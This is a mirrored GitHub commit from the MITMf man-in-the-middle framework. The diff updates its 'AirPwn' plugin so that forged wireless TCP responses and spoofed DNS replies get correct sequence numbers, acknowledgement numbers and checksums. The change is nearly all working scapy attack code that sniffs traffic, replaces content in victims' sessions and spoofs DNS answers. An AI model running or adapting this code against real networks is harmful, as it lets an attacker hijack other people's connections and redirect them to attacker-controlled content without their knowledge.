mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-10 07:13:49 -07:00
airpwn plugin now calculates correct seq, ack and checksums
This commit is contained in:
parent
51a4b65e26
commit
76fd67d245
1 changed files with 20 additions and 0 deletions
|
@ -74,11 +74,21 @@ class AirPwn(Plugin):
|
||||||
response.src, response.dst = packet.dst, packet.src
|
response.src, response.dst = packet.dst, packet.src
|
||||||
# Switch the ports
|
# Switch the ports
|
||||||
response.sport, response.dport = packet.dport, packet.sport
|
response.sport, response.dport = packet.dport, packet.sport
|
||||||
|
# Switch sequence and ack
|
||||||
|
response[TCP].seq = packet[TCP].ack
|
||||||
# Inject our data
|
# Inject our data
|
||||||
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
||||||
|
# Calculate new ack
|
||||||
|
response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
|
||||||
|
#delete packet checksums
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[TCP].chksum
|
||||||
|
#Some scapy-fu to re-calculate all checksums
|
||||||
|
response = response.__class__(str(response))
|
||||||
# Send the packet
|
# Send the packet
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Replaced content" % response.src)
|
logging.info("%s >> Replaced content" % response.src)
|
||||||
|
|
||||||
elif 'ignore' not in rule[1].keys():
|
elif 'ignore' not in rule[1].keys():
|
||||||
if (re.search(rule[1]['match'], packet[Raw].load)):
|
if (re.search(rule[1]['match'], packet[Raw].load)):
|
||||||
response = packet.copy()
|
response = packet.copy()
|
||||||
|
@ -86,7 +96,12 @@ class AirPwn(Plugin):
|
||||||
response.addr1, response.addr2 = packet.addr2, packet.addr1
|
response.addr1, response.addr2 = packet.addr2, packet.addr1
|
||||||
response.src, response.dst = packet.dst, packet.src
|
response.src, response.dst = packet.dst, packet.src
|
||||||
response.sport, response.dport = packet.dport, packet.sport
|
response.sport, response.dport = packet.dport, packet.sport
|
||||||
|
response[TCP].seq = packet[TCP].ack
|
||||||
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
response[Raw].load = open(rule[1]['response'], 'rb').read()
|
||||||
|
response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[TCP].chksum
|
||||||
|
response = response.__class__(str(response))
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Replaced content" % response.src)
|
logging.info("%s >> Replaced content" % response.src)
|
||||||
|
|
||||||
|
@ -110,6 +125,11 @@ class AirPwn(Plugin):
|
||||||
rdata = self.dnspwn
|
rdata = self.dnspwn
|
||||||
)
|
)
|
||||||
|
|
||||||
|
del response[IP].chksum
|
||||||
|
del response[UDP].chksum
|
||||||
|
del response[UDP].len
|
||||||
|
response = response.__class__(str(response))
|
||||||
|
|
||||||
sendp(response, iface=self.mon_interface, verbose=False)
|
sendp(response, iface=self.mon_interface, verbose=False)
|
||||||
logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
|
logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue